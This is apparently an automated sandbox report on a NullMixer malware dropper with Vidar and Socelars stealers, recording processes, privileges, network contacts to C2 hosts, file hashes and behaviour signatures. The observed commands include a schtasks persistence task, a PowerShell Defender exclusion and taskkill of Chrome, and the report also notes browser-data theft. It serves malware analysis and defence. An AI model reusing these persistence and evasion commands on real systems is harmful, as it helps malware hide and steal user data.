Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\4f5baa1083db067.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2524 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 432

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5BC7.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3040 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.iyiqian.com udp
MD 176.123.2.239:80 176.123.2.239 tcp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
N/A 127.0.0.1:49266 tcp
N/A 127.0.0.1:49269 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
LV 45.142.213.135:30058 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\setup_install.exe

MD5 aaaf685d045b423d4d96ecaca344b4d5
SHA1 f2264a40421e66029db1cdf7fe8bb8ada2614862
SHA256 f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8
SHA512 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2264-31-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2264-28-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\53516815d3135fe3.exe

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\e4b2f18fb52218.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\f34b9ab9db6d16.exe

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\453c5fa76a849.exe

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e010.exe

C:\Windows\winnetdriv.exe

C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\4f5baa1083db067.exe

\Users\Admin\AppData\Local\Temp\7zSCD9986B6\9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\CabAD01.tmp

C:\Users\Admin\AppData\Local\Temp\TarADCF.tmp

C:\ProgramData\softokn3.dll

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Local\Temp\7zS5BC7.tmp\Install.cmd

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5GWW47WY\favicon[1].png

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-25 09:33

Reported

2024-11-25 09:36

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

